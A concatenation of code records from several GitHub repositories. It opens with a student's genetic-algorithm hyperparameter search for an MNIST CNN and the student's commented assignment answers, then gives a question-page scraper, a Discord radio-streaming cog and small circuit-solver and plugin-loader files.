\n\t\t\t\t\t\t\tepochs=self.epoch_ls[ep_index],\n\t\t\t\t\t\t\toptimizer=self.optimizer_ls[opt_index])\n\n\t\tprint('#'*3,' Model Training: \\n')\n\t\tprint('- optimizer : lr= {} decay= {}'.format( self.lr_ls[lr_index], self.decay_ls[decay_index]))\n\t\tprint('- neurons : dropout_rate {}'.format(self.dropout_ls[dr_index]))\n\t\tprint('- batch_size= {} epochs= {} '.format(self.batch_size_ls[bs_index], self.epoch_ls[ep_index]),'#'*3,\"\\n\")\n\n\t\tmodelCNN.create_model()\n\t\tmodelCNN.train()\n\t\tmodelCNN.test()\n\t\t#print(modelCNN.model.summary())\n\t\tresult = [policy, modelCNN.history, modelCNN.train_time, modelCNN.accuracy] \n\t\treturn result\n\n\tdef initialize_agents(self):\n\t\tself.overall_results = []\n\t\t\n\t\tfor _ in range(self.num_agents):\n\t\t\tpolicy = self.gen_random_policy()\n\t\t\tresult = self.generate_single_agent(policy)\n\t\t\t#[:,0]\n\t\t\t#if policy not in self.overall_results: ###\n\t\t\tself.overall_results.append(result)\n\t\t\tself.store_policy_result(result)\n\t\t\n\tdef evaluate_policies(self):\n\t\tresults_array = np.array(self.overall_results)\n\t\taccuracy_arr = results_array[:,3]\n\t\tself.overall_accuracy = accuracy_arr.mean()\n\t\tself.max_accuracy = accuracy_arr.max()\n\n\t\ttime_arr = results_array[:,2]\n\t\tself.overall_time = time_arr.mean()\n\t\tself.min_time = time_arr.min()\n\t\t\n\t\tpolicy_score_sorter = {}\n\t\tsorted_scores = []\n\t\tfor num, result in enumerate(self.overall_results):\n\t\t\tscore = 0 \n\t\t\t\n\t\t\tif result[3] > 0.5:\n\t\t\t\tscore += 10\n\n\t\t\tif result[3] >= self.overall_accuracy:\n\t\t\t\tif result[3] == self.max_accuracy:\n\t\t\t\t\tscore += 20\n\n\t\t\t\telse:\n\t\t\t\t\tscore += 3\n\t\t\t\n\t\t\tif result[2] <= self.overall_time:\n\t\t\t\tif result[2] == self.min_time:\n\t\t\t\t\tscore += 10\n\t\t\t\telse:\n\t\t\t\t\tscore += 5\n\n\t\t\tpolicy_score_sorter[num] = score \n\n\t\tsorted_scores = sorted(policy_score_sorter.items(), \n\t\t\t\t\t\t\t\t key=lambda kv: kv[1], \n\t\t\t\t\t\t\t\t reverse=True)\n\t\tsorted_policies = [] \n\t\t### sorted_policies [(score, policy)] it will sort from highest to lowest\n\t\tfor policy_num, score in sorted_scores:\n\t\t\tsorted_policies.append(self.overall_results[policy_num])\n\t\t\n\t\tself.overall_results = sorted_policies\n\t\n\tdef agent_selection (self):\n\t\t\n\t\tself.parents = []\n\t\t### Make sure odd numbers are not used\n\t\t### The last agent with the worst performance is droppped\n\t\tif len(self.overall_results)%2 != 0:\n\t\t\tself.overall_results.pop(-1)\n\t\t### max pairs is the number of existing agents divided by four\n\t\t### since each pair generates 2 offsprings \n\t\t### we will keep the same number of agents to avoid exponential growth of agent population\n\t\tmax_pairs = int(len(self.overall_results)//4)\n\t\tpossible_parents = len(self.overall_results)-1\n\t\tcount = 0\n\n\t\twhile len(self.parents) < max_pairs:\n\n\t\t\tif count < max_pairs:\n\n\t\t\t\tparent1 = count\n\t\t\t\tparent2 = np.random.choice(possible_parents, size=((1)))[0]\n\t\t\t\tparents_codes = np.array([parent1,parent2])\n\n\t\t\telse:\n\t\t\t\tparents_codes = np.random.choice(possible_parents, size=((2)))\n\n\t\t\tif parents_codes[0] != parents_codes[1]:\n\n\t\t\t\tparent1 = parents_codes[0]\n\t\t\t\tparent2 = parents_codes[1]\n\n\t\t\t\tpolicy1 = np.array(self.overall_results[parent1][0])\n\t\t\t\tpolicy2 = np.array(self.overall_results[parent2][0])\n\t\t\t\t#\n\t\t\t\tself.parents.append([policy1,policy2])\n\t\t\t\tcount += 1\n\n\tdef crossover(self, policy1, policy2,genes_pos = [0, 2, 4]):\n\t\t'''\n\t\tArguments\n\t\t----------\n\t\tpolicy1: parent 1\n\t\tpolicy2: parent 2\n\t\tself.tt_gen_pos_01 = len(lr_ls)\n\t\tself.tt_gen_pos_02 = len(decay_ls)\n\t\tself.tt_gen_pos_03 = len(batch_size_ls)\n\t\tself.tt_gen_pos_04 = len(epoch_ls)\n\t\tself.tt_gen_pos_05 = len(dropout_ls)\n\t\tReturn\n\t\t--------\n\t\tnew_policy: offspring\n\t\t'''\n\t\tpolicyX = policy1.copy()\n\t\tpolicyY = policy2.copy()\n\t\tfor g_pos in genes_pos:\n\t\t\t#from IPython import embed; embed()\n\t\t\tslice_policyX = policyX[g_pos]\n\t\t\tslice_policyY = policyY[g_pos]\n\n\t\t\tpolicyY[g_pos]=slice_policyX\n\t\t\tpolicyX[g_pos]=slice_policyY\n\n\t\tchild_policy1 = policyY\n\t\tchild_policy2 = policyX\n\t\t# IMPLEMENT!\n\t\t# generate a child policy from cross-over of the parents\n\n\t\treturn child_policy1, child_policy2\n\n\tdef mutation (self, policy, nun_gen_2_mutate = 2, mut_prob_thr=0.05):\n\n\t\tmutation_prob = float(np.random.choice(100,1))/100\n\t\tavailable_positions = np.arange(0,5)\n\n\t\tif mutation_prob <= mut_prob_thr:\n\n\t\t\tpositions = []\n\t\t\tmutations = []\n\n\t\t\tfor _ in range(nun_gen_2_mutate):\n\n\t\t\t\tposition = int( np.random.choice( 6, 1) ) ## 5 gen positions\n\t\t\t\tif position == 0:\n\t\t\t\t\tall_moves = self.tt_gen_pos_01 - 1\n\t\t\t\telif position == 1:\n\t\t\t\t\tall_moves = self.tt_gen_pos_02 - 1\n\t\t\t\telif position == 2:\n\t\t\t\t\tall_moves = self.tt_gen_pos_03 - 1\n\t\t\t\telif position == 3:\n\t\t\t\t\tall_moves = self.tt_gen_pos_04 - 1\n\t\t\t\telif position == 4:\n\t\t\t\t\tall_moves = self.tt_gen_pos_05 - 1\n\t\t\t\telif position == 5:\n\t\t\t\t\tall_moves = self.tt_gen_pos_06 - 1\n\t\t\t\tif all_moves == 0:\n\t\t\t\t\tmove =0\n\t\t\t\telse:\n\t\t\t\t\tmove = int( np.random.choice( all_moves, 1 ) ) \n\n\t\t\t\tif position not in positions:\n\t\t\t\t\tpos_mask = available_positions != position\n\t\t\t\t\tavailable_positions = available_positions[pos_mask]\n\t\t\t\t\tpositions.append(position)\n\t\t\t\telse:\n\t\t\t\t\tposition = int(np.random.choice(available_positions,1))\n\t\t\t\t\tpositions.append(position)\n\t\t\t\t\n\t\t\t\tmutate = [move, position] \n\t\t\t\tmutations.append(mutate)\n\t\t\t\tpolicy[position] = move\n\n\t\treturn policy\n\t\n\tdef update_agents(self):\n\n\t\tself.agent_selection() ### this updates which agents will perfom crossover in the self.parents where parents = [ [policy1,policy2], [policyN,policyM]]\n\t\t\n\t\tnew_policies = []\n\t\tfor policy1, policy2 in self.parents:\n\t\t\tchild_policy1, child_policy2 = self.crossover(policy1, policy2)\n\n\t\t\tchild_policy1 = self.mutation(child_policy1)\n\t\t\tchild_policy2 = self.mutation(child_policy2)\n\n\t\t\tnew_policies.append(child_policy1)\n\t\t\tnew_policies.append(child_policy2)\n\n\t\t### drop_weaker older agents\n\t\tnew_agents = int(len(new_policies))\n\t\tfor _ in range (new_agents):\n\t\t\tself.overall_results.pop(-1)\n\n\t\t### add new agents\n\t\tprint(\"\\n Add New Policies \")\n\t\tcount =0\n\t\tfor new_policy in new_policies:\n\t\t\tnew_policy_ls = new_policy.tolist() ### return from numpy to list format\n\t\t\tnew_result = self.generate_single_agent(new_policy_ls)\n\t\t\t#print(\"new_policy = \", count, new_policy)\n\t\t\t#print(\"overall_results lenght= \", len(self.overall_results))\n\t\t\t#print(\"shape overall_results = \", np.array(self.overall_results).shape)\n\t\t\tself.overall_results.append(new_result)\n\t\t\tself.store_policy_result(new_result)\n\t\t\tcount += 1\n\t\t\n\tdef show_result(self,result,num):\n\n\t\tpolicy = result[0]\n\n\t\tlr_index = policy[0]; lr = self.lr_ls[lr_index]\n\t\tdecay_index = policy[1]; decay = self.decay_ls[decay_index] \n\t\tbs_index = policy[2]; batch_size = self.batch_size_ls[bs_index]\n\t\tep_index = policy[3]; epochs=self.epoch_ls[ep_index]\n\t\tdr_index = policy[4]; dropout_rate = self.dropout_ls[dr_index] \n\t\topt_index = policy[5]; optimizer = self.optimizer_ls[opt_index] \n\t\t\n\t\thistory = result[1]\n\t\tplt.plot(history.history['loss'])\n\t\tplt.plot(history.history['val_loss'])\n\t\ttitle = 'model number {} time to train= {} seconds and accuracy {} % \\n'.format( num, np.round(result[2], decimals=2), np.round(result[3], decimals = 3)*100)\n\t\ttitle += ' - optimizer: {} lr= {} decay= {} \\n'.format(optimizer, lr, decay)\n\t\ttitle += ' - neurons : dropout_rate {} \\n'.format(dropout_rate)\n\t\ttitle += ' - batch_size= {} epochs= {} '.format(batch_size, epochs)\n\t\t\t\t\n\t\tplt.title( title)\n\t\tplt.ylabel('loss')\n\t\tplt.xlabel('epoch')\n\t\tplt.legend(['train', 'val'], loc='upper left')\n\t\tplt.ylim((0,15))\n\t\tplt.show()\n\n\tdef best_models(self, final_models = 3, max_generations = 5):\n\n\t\tcount = 0\n\t\twhile count <= max_generations:\n\t\t\tprint(\"#\"*200)\n\t\t\tprint(\"#\"*25, \" Generation {}\".format(count), \"#\"*25,\"\\n\")\n\t\t\tif count == 0:\n\t\t\t\tself.initialize_agents()\n\t\t\telse:\n\t\t\t\tself.update_agents()\n\t\t\tself.evaluate_policies()\n\t\t\tcount += 1\n\t\t\n\t\tbest_models = []\n\t\tfor num in range(final_models):\n\t\t\tresult = self.overall_results[num]\n\t\t\tself.show_result(result,num)\n\t\t\tbest_models.append(result)\n\t\treturn result\n\nprint(\"#\"*25, \" Set hyperparameters lists\", \"#\"*25,\"\\n\")\nlr_ls = [1e-3,1e-4]\ndecay_ls = [1e-6,1e-7]\nbatch_size_ls = [32,500]\nepoch_ls = [150,250]\ndropout_ls = [0.05, 0.01]\noptimizer_ls = [\"SGD\",\"AdaGrad\",\"RMSProp\"]\n\nprint(\"#\"*25, \" Genetic Algorithm Start\", \"#\"*25,\"\\n\")\nga = Genetic_Algorithm(lr_ls,decay_ls,batch_size_ls, epoch_ls, dropout_ls, optimizer_ls,\n\t\t\t\t\t\tX_train, y_oh_train, X_test, y_oh_test, y_test, num_agents=30)\n\nprint(\"#\"*25, \" Set hyperparameters lists\", \"#\"*25,\"\\n\")\nbest = ga.best_models(final_models = 10, max_generations = 2)\n\nall_results = ga.tested_policies\n\nfor policy_name in all_results.keys():\n\tpolicy = ga.convert_name_2_policy(policy_name)\n\n\tlr_index = policy[0]\n\tdecay_index = policy[1]\n\tbs_index = policy[2]\n\tep_index = policy[3]\n\tdr_index = policy[4]\n\topt_index = policy[5]\n\t\n\tdropout_rate = ga.dropout_ls[dr_index], \n\tlr = ga.lr_ls[lr_index], \n\tdecay = ga.decay_ls[decay_index], \n\tbatch_size = ga.batch_size_ls[bs_index], \n\tepochs=ga.epoch_ls[ep_index]\n\toptimizer = ga.optimizer_ls[opt_index]\n\n\tfor result in all_results[policy_name]:\n\t\t\n\t\ttitle = '\\n model - time to train= {} seconds and accuracy {} % \\n'.format( np.round(result[2], decimals=2), np.round(result[3], decimals = 3)*100)\n\t\ttitle += ' - optimizer :{} lr= {} decay= {} \\n'.format(optimizer, lr, decay)\n\t\ttitle += ' - neurons : dropout_rate {} \\n'.format(dropout_rate)\n\t\ttitle += ' - batch_size= {} epochs= {} '.format(batch_size, epochs)\n\t\tprint(title)\n\n\n# %%\n\n\n# ### Question 1\n# **The data set**\n# \n# Plot a three examples from the data set.\n# * What type of data are in the data set?\n# \n# \n# The MNIST dataset contains grayscale images of handwritten numbers from zero to nine. \n# \t\tWhen they are imported in the fetch_openml an array with shape images vs 784 is retrieved. \n# \t\t784 is the flattened form of the image and the input values are pixel values ranging from 0 – 255. \n# \t\tBecause it has only one color channel, it means that the dataset is grayscale.\n# \n# \n# * What does the line ```X = X.reshape(X.shape[0], 28, 28, 1)``` do?\n# \n# This operation reshapre the flatten array into a new array with (columns, height, witdh, colour_channel)\n# \n# \n# Look at how the encoding of the targets (i.e. ```y```) is changed. E.g. the lines\n# ```\n# y_oh = np.zeros((num_tot, num_classes))\n# y_oh[range(num_tot), y] = 1\n# ```\n# Print out a few rows of ```y``` next to ```y_oh```.\n# * What is the relationship between ```y``` and ```y_oh```?\n# \n# \n# \"y\" means the supervised information that tells you the specific input must belong to a output\n# \"y\" ranges from 0 to 9 while y_oh is the one_hot encoding.\n# \n# \n# \n# * What is the type of encoding in ```y_oh``` called and why is it used?\n# \n# \n# y_oh is the one_hot encoding and its used for classification problems.\n# Since deeplearning are based on math and numbers, \n# the output of a classification must be a numerical value and not a string. \n# Therefore a multiclassification problem should have a one hot encoded \n# so that the ouput of the neural network can be numerically compared with the prediction.\n# \n# Ex: A NN with three classes (\"dog,cat,human\") should have 3 columns one for dog, one for cat and another for humam\n# a dog picture would have its one hot encoding (1 , 0 , 0) because it belongs to one class \n# a cat picture would have its one hot encoding (0 , 0 , 1) and a human would have (0, 0, 1)\n# \n# \n# \n# * Plot three data examples in the same figure and set the correct label as title. \n# * It should be possible to see what the data represent.\n\n# %%\n# ### Question 2\n# **The model**\n# \n# Below is some code for bulding and training a model with Keras.\n# * What type of network is implemented below? I.e. a normal MLP, RNN, CNN, Logistic Regression...?\n# The type of the network used is CNN (Convolutional Neural Networks) \n# * What does ```Dropout()``` do?\n# \"Dropout randomly disconnects neurons connections to make the CNN more genralist, \n# and thus reducing the probability of overfitting\" \n# * Which type of activation function is used for the hidden layers?\n# Rectified Linear Unit (ReLU) \n# * Which type of activation function is used for the output layer?\n# Softmax \n# * Why are two different activation functions used?\n# ReLU is used to solve the vanishing gradient problem \n#\t\t\t\t\t\t\t and it reduced the influence of negative values after a convolution,\n# while softmax is used to transform the output layer probabilities\n# into the most probable output \n# * What optimizer is used in the model below?\n# Although the name of the function is SGD (Stochastic Gradient Descent)\n# \t\t\t\t\t\tthe model useds batch gradient descent \n# * How often are the weights updated (i.e. after how many data examples)?\n# The epoch and batches will define when the weights are updated. \n# \t\t\t\t\t\t\tSince this specific model is using mini-batch gradient descent,\n# \t\t\t\t\t\t\tthe model will update their weights after completing a batch.\n# \t\t\t\t\t\t\tA dataset with 800 images with a batch size of 32 \n# \t\t\t\t\t\t\twill have 25 weights updates per epoch. \n# * What loss function is used?\n# \n# Categorical crossentropy \n# \n# \n# * How many parameters (i.e. weights and biases, NOT hyper-parameters) does the model have?\n# \n# <*answer here*> \n# \n#from IPython import embed; embed()\n\n# %%\n# ### Question 3\n# \n# * **Vizualize the training**. Use the model above to observe the training process. Train it for 150 epochs and then plot both \"loss\" and \"val_loss\" (i.e. loss on the valiadtion set, here the terms \"validation set\" and \"test set\" are used interchangably, but this is not always true). What is the optimal number of epochs for minimizing the test set loss? \n# * Remember to first reset the weights (```model.reset_states()```), otherwise the training just continues from where it was stopped earlier.\n# \n# * **Optimizer**. Select three different optimizers and for each find the close-to-optimal hyper-parameter(s). In your answer, include a) your three choises, b) best hyper-parameters for each of the three optimizers and, c) the code that produced the results.\n# * NOTEa that how long the training takes varies with optimizer. I.e., make sure that the model is trained for long enough to reach optimal performance.\n# \n# * **Dropout**. Use the best optimizer and do hyper-parameter seach and find the best value for ```Dropout()```.\n# \n# * **Best model**. Combine the what you learned from the above three questions to build the best model. How much better is it than the worst and average models?\n# \n# <*answer here*> \n# \n# \n# * **Results on the test set**. When doing this search for good model configuration/hyper-parameter values, the data set was split into *two* parts: a training set and a test set (the term \"validation\" was used interchangably wiht \"test\"). For your final model, is the performance (i.e. accuracy) on the test set representative for the performance one would expect on a previously unseen data set (drawn from the same distribution)? Why?\n# \n# <*answer here*> \n# \n# \n# ## Further information\n# For ideas about hyper-parameter tuning, take a look at the strategies described in the sklearn documentation under [model selection](https://scikit-learn.org/stable/model_selection.html), or in this [blog post](https://blog.tensorflow.org/2020/01/hyperparameter-tuning-with-keras-tuner.html) from TensorFlow. For a more thorough discussion about optimizers see [this video](https://www.youtube.com/watch?v=DiNzQP7kK-s) discussing the article [Descending through a Crowded Valley -- Benchmarking Deep Learning Optimizers](https://arxiv.org/abs/2007.01547).\n# \n# \n# **Good luck!**\n\n\n# %%\n","repo_name":"ricardoluhms/cnn_mnist_gen_alg","sub_path":"tutorial_mmai_assignment_3_v2.py","file_name":"tutorial_mmai_assignment_3_v2.py","file_ext":"py","file_size_in_byte":26398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30911974194","text":"# -*- coding: utf-8 -*-\n\nimport requests\n\nfrom achihuo_mini.async_loop import AsyncLoop\nfrom achihuo_mini.item import Item\nfrom vko_spider.mini_spider.vko_mini_spider import VkoMiniSpider\n\nHEADERS = {\n'Accept-Encoding': 'gzip, deflate',\n'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4',\n'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36',\n'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n'Accept': '*/*',\n'X-Requested-With': 'XMLHttpRequest',\n'Connection': 'keep-alive',\n'Referer': 'http://tiku.vko.cn/',\n}\n\nURL = 'http://tiku.vko.cn/resolve/{}'\n\nclass VkoMiniSpider(AsyncLoop):\n\n NAME = 'vko_mini_spider'\n\n def __init__(self):\n super(VkoMiniSpider, self).__init__(concurrency=30, cache_backend='ssdb')\n\n\ndef make_item(qid):\n url = URL.format(qid)\n item = Item(dict(\n method = 'GET',\n url = url,\n max_retry = 2,\n timeout = 60,\n ))\n return item\n\n\ndef request(qid):\n url = URL.format(qid)\n resp = requests.get(url, headers=HEADERS)\n return resp.text\n\n\ndef find_max_qid():\n min_qid = 1\n max_qid = 1000000\n\n def binary_search(mnq, mxq):\n if mxq - mnq <= 1:\n return mxq\n\n mid = (mxq + mnq) // 2\n print(mid)\n html = request(mid)\n if not html.startswith('null('):\n return binary_search(mnq, mid)\n else:\n return binary_search(mid, mxq)\n\n return binary_search(min_qid, max_qid)\n\n\ndef main():\n loop = VkoMiniSpider()\n\n max_qid = find_max_qid()\n for qid in range(1, max_qid):\n item = make_item(qid)\n loop.add_task('get_question', item, task_name=item.url, repeat=False)\n\n\ndef test():\n max_qid = find_max_qid()\n print('max_qid', max_qid)\n\n\nif __name__ == '__main__':\n main()\n # test()\n","repo_name":"waryhao/Afanti_tiku","sub_path":"vko_spider/mini_spider/vko_add_next_qids.py","file_name":"vko_add_next_qids.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13404711758","text":"import json\nimport array\nimport struct\nimport audioop\nimport discord\nimport asyncio\nimport requests\nimport threading\nfrom io import BufferedIOBase, BytesIO\nfrom queue import Queue, Empty as EmptyQueue\nfrom typing import *\nfrom subprocess import Popen, PIPE\nfrom functools import partial\nfrom discord.ext import commands, tasks\nfrom discord.ext.commands import CommandError\n\n\nclass OggVorbisStream:\n\n def __init__(self, file_handle: BufferedIOBase) -> None:\n self.page_iter = self.page_generator(file_handle)\n\n def page_generator(self, file_handle: BufferedIOBase):\n while file_handle.read(4) == b\"OggS\":\n yield OggPage(file_handle)\n\n def get_next_page(self):\n try:\n return next(self.page_iter)\n except StopIteration:\n return None\n\n\nclass OggPage:\n\n ogg_page_struct = struct.Struct(\"=BBQIIIB\")\n\n def __init__(self, file_handle: BufferedIOBase) -> None:\n self.version, self.mode, self.granule, self.serial, self.page_no, self.crc, self.len_seg_table = self.ogg_page_struct.unpack(\n file_handle.read(self.ogg_page_struct.size))\n\n self.seg_table = array.array('B', struct.unpack(\n 'B'*self.len_seg_table, file_handle.read(self.len_seg_table)))\n\n self.data = file_handle.read(sum(self.seg_table))\n\n def convert_to_bytes(self):\n return b\"OggS\" + self.ogg_page_struct.pack(self.version, self.mode, self.granule, self.serial, self.page_no, self.crc, self.len_seg_table) + self.seg_table.tobytes() + self.data\n\n\nclass RadioPlayer(discord.AudioSource):\n \"\"\"The radio player class\"\"\"\n\n def __init__(self, radio_code_name: str, radio_name: str, radio_url: str, radio_format: str, discord_ctx: commands.Context):\n self.radio_code_name = radio_code_name\n self.radio_name = radio_name\n self.radio_url = radio_url\n self.radio_format = radio_format\n\n self.discord_ctx = discord_ctx\n self.event_loop: asyncio.AbstractEventLoop = discord_ctx.bot.loop\n self.last_now_playing_message: discord.Message = None\n\n self._volume = 0.07\n self.audio_queue = Queue()\n\n if self.radio_format == \"direct\":\n ffmpeg_command_line = \"ffmpeg -i {url} -f s16le -ac 2 -ar 48000 pipe:1\".format(\n url=radio_url).split()\n\n self.ffmpeg_process = Popen(\n ffmpeg_command_line, stdout=PIPE, creationflags=0x08000000)\n else:\n ffmpeg_command_line = \"ffmpeg -i pipe:0 -f s16le -ac 2 -ar 48000 pipe:1\".split()\n\n self.ffmpeg_process = Popen(\n ffmpeg_command_line, stdin=PIPE, stdout=PIPE, creationflags=0x08000000)\n # the creationflags part is only if this is running in Windows\n\n # Threading!\n stdin_thread = threading.Thread(\n target=self.stdin_blaster, daemon=True)\n stdin_thread.start()\n stdout_thread = threading.Thread(target=self.drain_stdout, daemon=True)\n stdout_thread.start()\n\n self.setup_auto_disconnect()\n\n def drain_stdout(self):\n stdout: IO = self.ffmpeg_process.stdout\n while True:\n data = stdout.read(3840)\n if not data:\n break\n try:\n self.audio_queue.put(data)\n except AttributeError:\n return\n\n def stdin_blaster(self):\n stdin: IO = self.ffmpeg_process.stdin\n if self.radio_format != \"vorbis\":\n headers = {\"Icy-MetaData\": \"1\"}\n with requests.get(self.radio_url, headers=headers, stream=True) as response:\n response.raise_for_status()\n\n metaint: int = int(response.headers.get(\"icy-metaint\"))\n try:\n data = response.raw.read(metaint)\n while True:\n stdin.write(data)\n\n metadata_block_size = int.from_bytes(\n response.raw.read(1), byteorder=\"little\")\n if metadata_block_size != 0:\n metadata_bytes: bytes = response.raw.read(\n metadata_block_size * 16)\n self.event_loop.create_task(\n self.tell_text_channel_currently_playing(metadata_bytes.decode(\"utf-8\")))\n\n data = response.raw.read(metaint)\n except OSError:\n # ffmpeg closed\n return\n else:\n with requests.get(self.radio_url, stream=True) as response:\n response.raise_for_status()\n\n ogg_stream = OggVorbisStream(response.raw)\n\n page = ogg_stream.get_next_page()\n\n while page:\n if page.data[:7] == b\"\\x03vorbis\":\n metadata = dict()\n\n data_io = BytesIO(page.data)\n\n data_io.read(7)\n\n data_io.read(int.from_bytes(\n data_io.read(4), \"little\", signed=False))\n\n for _ in range(int.from_bytes(data_io.read(4), \"little\", signed=False)):\n separated_metadata = data_io.read(int.from_bytes(\n data_io.read(4), \"little\", signed=False)).decode().split('=')\n metadata[separated_metadata[0].lower()] = \"=\".join(\n separated_metadata[1:])\n\n del data_io\n\n self.event_loop.create_task(self.tell_np_vorbis(metadata))\n\n del metadata\n\n try:\n stdin.write(page.convert_to_bytes())\n except OSError:\n return\n\n page = ogg_stream.get_next_page()\n\n async def tell_np_vorbis(self, metadata: Dict):\n if self.last_now_playing_message:\n await self.last_now_playing_message.delete()\n self.last_now_playing_message = await self.discord_ctx.send(f\"Now playing {metadata['artist']} - {metadata['title']} from {self.radio_name}\")\n\n @property\n def volume(self):\n return self._volume\n\n @volume.setter\n def volume(self, value: float):\n self._volume = min(1.0, value)\n\n def get_current_song_title(self, metadata_string: str):\n \"\"\"Temp func until able to tell what is playing in the text channel\"\"\"\n metadatas = metadata_string.split(\";\")\n for metadata_line in metadatas:\n metadata_line_pair = metadata_line.split(\"=\")\n if metadata_line_pair[0] == \"StreamTitle\":\n # print(\"Currently playing {song_name} in {server_name}\".format(\n # song_name=metadata_line_pair[1].strip(\"'\"), server_name=self.discord_ctx.guild))\n # break\n return metadata_line_pair[1].strip(\"'\")\n\n async def tell_text_channel_currently_playing(self, metadata: str):\n song_name = await self.event_loop.run_in_executor(None, partial(self.get_current_song_title, metadata))\n if self.last_now_playing_message:\n await self.last_now_playing_message.delete()\n self.last_now_playing_message = await self.discord_ctx.send(f\"Now playing {song_name} from {self.radio_name}\")\n\n def setup_auto_disconnect(self):\n @tasks.loop(minutes=5, loop=self.event_loop)\n async def auto_disconnect():\n voice_client: discord.VoiceClient = self.discord_ctx.voice_client\n members: List[discord.Member] = voice_client.channel.members\n if len([member for member in members if not member.bot]) == 0:\n await self.discord_ctx.send(\"Disconnecting due to there is nobody in the VC\")\n voice_client.stop()\n await voice_client.disconnect()\n\n auto_disconnect.start()\n self.auto_disconnect: tasks.Loop = auto_disconnect\n\n def read(self):\n try:\n return audioop.mul(self.audio_queue.get(timeout=15), 2, self._volume)\n except EmptyQueue:\n return b''\n\n def cleanup(self):\n self.auto_disconnect.cancel()\n self.ffmpeg_process.terminate()\n\n del self.auto_disconnect\n del self.audio_queue\n del self.ffmpeg_process\n del self.last_now_playing_message\n\n del self.radio_code_name\n del self.radio_format\n del self.radio_name\n del self.radio_url\n\n\nclass Radio(commands.Cog):\n \"\"\"Radio Cog Class\"\"\"\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(\"Radio Cog is loaded.\")\n\n @commands.command()\n async def radio(self, ctx: commands.Context, radio_code_name: str):\n \"\"\"Command to play a radio\"\"\"\n\n radio_data = await self.bot.loop.run_in_executor(None, partial(Radio.get_radio, radio_code_name))\n\n # There are always 3 element in radio_data, [0] is the url\n # [1] is the format and [2] is the radio name\n\n if not radio_data:\n return await ctx.send(f\"There is no such thing as {radio_code_name}\")\n\n player = await self.bot.loop.run_in_executor(None, partial(RadioPlayer, radio_code_name, radio_data[2], radio_data[0], radio_data[1], ctx))\n\n ctx.voice_client.play(player)\n\n @commands.command()\n async def stop_radio(self, ctx: commands.Context):\n voice_client: discord.VoiceClient = ctx.voice_client\n if voice_client.is_playing():\n voice_client.stop()\n await ctx.send(\"Stopped radio!\")\n\n @commands.command()\n async def radio_volume(self, ctx: commands.Context, volume: int):\n try:\n voice_client: discord.VoiceClient = ctx.voice_client\n voice_client.source.volume = float(volume / 100)\n except AttributeError as e:\n await ctx.send(\"Failed to change volume\")\n raise e\n await ctx.send(f\"Changed volume to {volume}\")\n\n @radio.before_invoke\n async def radio_before_invoke(self, ctx: commands.Context):\n if ctx.voice_client is None:\n if ctx.author.voice:\n await ctx.author.voice.channel.connect()\n print(\n f\"Connected to the {ctx.author}'s voice channel on {ctx.guild} server!\")\n else:\n await ctx.send(\"Please join a VC first!\")\n raise CommandError(\n f\"{ctx.author} tried to summon bot while being outside of VC.\")\n\n # This part is to check if it need to stop the current player\n # or not by checking either if it the user is asking to listen to\n # currently playing radio station or if it is not radio player at all\n elif ctx.voice_client.is_playing():\n if ctx.voice_client.source is RadioPlayer:\n radio_player: RadioPlayer = ctx.voice_client.source\n # check if currently playing station is the same\n # as the one being asked to tuned into\n # ctx.args[2] is the radio_name argument of the radio command\n if radio_player.radio_code_name == ctx.args[2]:\n await ctx.send(f\"Already tuned to {ctx.args[2]}!\")\n raise CommandError(\n f\"User {ctx.author} tried to tune into the currently tuned radio station.\")\n # if we reached here, it means that the source is either some type of other source/player\n # or its a different station, either way, we just stop them\n ctx.voice_client.stop()\n\n @commands.command(aliases=[\"radios\"])\n async def list_all_radio(self, ctx: commands.Context):\n line_format = \"{radio_name} -> {radio_code}\\n\"\n formatted_str = \"\"\n\n radios: Dict = await self.bot.loop.run_in_executor(None, Radio.get_radios)\n\n radio_code: str\n radio_data: List[str]\n for radio_code, radio_data in radios.items():\n formatted_str += line_format.format(\n radio_name=radio_data[2], radio_code=radio_code)\n\n await ctx.send(\n \"```\\n\" +\n formatted_str +\n \"```\"\n )\n\n @staticmethod\n def get_radio(radio_name: str) -> Union[Dict, bool]:\n with open(\"data/radios.json\", 'r') as json_file:\n radios: Dict = json.load(json_file)\n\n try:\n return radios[radio_name]\n except:\n return False\n\n @staticmethod\n def get_radios():\n with open(\"data/radios.json\", 'r') as json_file:\n radios: Dict = json.load(json_file)\n\n return radios\n\n\ndef setup(bot: commands.Bot):\n bot.add_cog(Radio(bot))\n","repo_name":"Naz1337/discord-naz-bot","sub_path":"cogs/radio.py","file_name":"radio.py","file_ext":"py","file_size_in_byte":12703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32830439153","text":"from enum import Enum\nfrom Core import Node\n\n\nclass TypeOfComp(Enum):\n Res = \"Resistance\"\n Node = \"Node\"\n IndVolt = \"Independent voltage\"\n IndCur = \"Independent Current\"\n\nclass Component():\n def __init__(self, type: TypeOfComp):\n self.__voltage: int = 0\n self.__charge: int = 0\n self.__type = type\n\n @property\n def Type(self):\n return self.__type\n\ndef checkExistanceOfNode(nodeNumber, nodes: dict):\n if nodeNumber in nodes:\n node = nodes[nodeNumber]\n else:\n node = Node.Node(nodeNumber)\n nodes[nodeNumber] = node\n return node\n","repo_name":"daniyalmaroufi/circuit-solver","sub_path":"Core/Component.py","file_name":"Component.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"12274694047","text":"import glob\nimport imp\nimport os.path\n\n\nclass Plugin(object):\n \"\"\"Base class for all plugins.\"\"\"\n\n capability = []\n\n @classmethod\n def is_capable(cls, requested_capability):\n \"\"\"Returns true if the requested capability is supported by this plugin\n \"\"\"\n for c in requested_capability:\n if c not in cls.capability:\n return False\n return True\n\n\ndef get_plugin(cls, requested_capability=None):\n if not requested_capability:\n requested_capability = []\n result = []\n for handler in cls.__subclasses__():\n if handler.is_capable(requested_capability):\n 